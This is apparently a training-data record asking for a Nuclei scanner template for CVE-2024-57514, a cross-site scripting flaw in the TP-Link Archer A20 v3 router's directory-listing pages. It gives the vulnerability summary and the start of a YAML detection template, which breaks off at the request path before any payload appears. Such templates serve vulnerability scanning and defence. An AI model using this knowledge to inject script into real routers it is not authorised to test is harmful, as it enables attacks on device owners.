{"instruction": "Generate a Nuclei template for CVE-2024-57514", "input": "Title: Cross-Site Scripting (XSS) in CVE-2024-57514\nSummary: The TP-Link Archer A20 v3 router is vulnerable to Cross-site Scripting (XSS) due to improper handling of directory listing paths in the web interface. When a specially crafted URL is visited, the router's web page renders the directory listing and executes arbitrary JavaScript embedded in the URL. This allows the attacker to inject malicious code into the page, executing JavaScript on the victim's browser, which could then be used for further malicious actions. The vulnerability was identified in the 1.0.6 Build 20231011 rel.85717(5553) version.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-57514\n\ninfo:\n name: TP-Link Archer A20 v3 Router - Cross-site Scripting\n author: s4e-io\n severity: medium\n description: The TP-Link Archer A20 v3 router is vulnerable to Cross-site Scripting (XSS) due to improper handling of directory listing paths in the web interface. When a specially crafted URL is visited, the router's web page renders the directory listing and executes arbitrary JavaScript embedded in the URL. This allows the attacker to inject malicious code into the page, executing JavaScript on the victim's browser, which could then be used for further malicious actions. The vulnerability was identified in the 1.0.6 Build 20231011 rel.85717(5553) version.\n tags: cve,cve2024,tplink,router,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ |